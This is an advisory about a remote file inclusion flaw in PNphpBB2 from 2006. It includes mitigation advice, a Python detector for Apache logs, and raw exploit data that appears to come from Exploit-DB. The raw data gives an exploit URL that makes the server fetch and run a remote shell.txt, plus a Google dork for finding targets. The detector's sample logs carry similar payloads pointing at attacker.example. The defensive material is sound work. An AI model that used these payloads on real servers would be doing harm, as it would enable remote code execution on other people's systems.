Vendor: PNphpBB2
By: Unknown
CVSS: N/A
Severity: HIGH
Type: Remote Code Execution
CWE: Not mentioned
Product Name: PNphpBB2
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Year: 2006

ZeroDay Smile

The vulnerability is in the includes/functions_admin.php file of the PNphpBB2 forum software. That file includes another script using the variable $phpbb_root_path before the variable has been initialised. When PHP's register_globals option is enabled, an unset variable is populated from the request, so an attacker who requests the file directly and sets the phpbb_root_path query parameter to a URL they control makes the server fetch and execute their PHP code (a remote file inclusion). The result is arbitrary code execution with the privileges of the web server process. The attack also relies on remote includes being allowed by the PHP configuration (allow_url_fopen, or allow_url_include on later PHP versions).

Mitigation:

To fix the vulnerability, add the provided code before the include statement in the vulnerable file. The guard checks whether the IN_PHPBB constant is defined; the legitimate entry scripts of the forum define it before including functions_admin.php, while a direct request to the file does not, so the direct request is terminated before the include runs. Note that this only blocks the direct-access path: the underlying weakness is the uninitialised variable combined with register_globals, so initialising $phpbb_root_path explicitly and disabling register_globals (and remote includes) in php.ini is the more complete fix.
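As an added detection example (not part of the original advisory and not PNphpBB2 code), the following Python scans Apache combined-format access log lines for requests that carry a phpbb_root_path query parameter, which the forum never sends legitimately, and classifies the value as a remote include, a directory traversal, or a plain variable override. The log lines are constructed for this example, using documentation IP ranges and the hostname attacker.example. The trailing "?" on the remote URL is the standard trick that turns the "includes/functions.php" suffix appended by the include into a query string on the attacker's server, so the file fetched is exactly the shell.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (not captured from a real host). The first and
# third match the exploit URL from the advisory, once plain and once percent-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2006:10:01:12 +0000] "GET /forum/includes/functions_admin.php?phpbb_root_path=http://attacker.example/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Sep/2006:10:02:03 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 8143 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Sep/2006:10:03:44 +0000] "GET /forum/includes/functions_admin.php?phpbb_root_path=ftp%3A%2F%2Fattacker.example%2Fs.txt%3F HTTP/1.1" 200 512 "-" "curl/7.15"
192.0.2.9 - - [18/Sep/2006:10:04:10 +0000] "GET /forum/includes/functions_admin.php?phpbb_root_path=../../ HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.9 - - [18/Sep/2006:10:05:00 +0000] "GET /forum/admin/index.php?phpbb_root_path=http://attacker.example/x.txt? HTTP/1.1" 200 20 "-" "Mozilla/5.0"
"""

# Apache combined log: client IP, identity, user, [timestamp], "request line", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Any URL scheme prefix: http://, https://, ftp://, and also PHP stream wrappers
# such as php://input or data:// that include() will open just as readily.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.IGNORECASE)

# Include files that a browser should never request directly.
DIRECT_INCLUDE_SUFFIXES = ("/includes/functions_admin.php",)


def classify_root_path(value: str) -> str:
    """Label a client-supplied phpbb_root_path value."""
    if SCHEME_RE.match(value):
        return "remote"       # remote file inclusion or stream wrapper
    if "../" in value or "..\\" in value:
        return "traversal"    # local file inclusion via directory traversal
    return "override"         # still hostile: the forum never passes this as a query parameter


def scan_log(text: str) -> list[dict]:
    """Return one finding per request whose query string sets phpbb_root_path."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        params = parse_qs(parts.query, keep_blank_values=True)
        if "phpbb_root_path" not in params:
            continue
        value = params["phpbb_root_path"][0]   # parse_qs percent-decodes for us
        findings.append({
            "ip": m.group("ip"),
            "path": parts.path,
            "direct_include": parts.path.endswith(DIRECT_INCLUDE_SUFFIXES),
            "value": value,
            "kind": classify_root_path(value),
            "status": int(m.group("status")),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:<14} {f['kind']:<9} direct_include={f['direct_include']} "
              f"{f['path']} <- {f['value']!r} (HTTP {f['status']})")
```

Every request carrying phpbb_root_path is worth an alert, because the parameter is internal to the forum and never appears in a legitimate link; a finding with direct_include set is the advisory's exact exploit path. Once register_globals is off the include can no longer be hijacked, but the log signal still identifies hosts scanning for the bug.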

Exploit-DB raw data:

Yeah, another ZeroDay Smile

Vendor: http://www.pnphpbb.com/

Vulnerable File: includes/functions_admin.php

Vulnerable Code:

// $phpbb_root_path isn't initialized before it is used here

include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );

Method To Use:

http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?

How To Fix:

Add this code before the include
Code:
if ( !defined('IN_PHPBB') )
{
   die("Hacking attempt");
}


Google Dork: Powered by PNphpBB2 / Powered por PNphpBB2

# milw0rm.com [2006-09-18]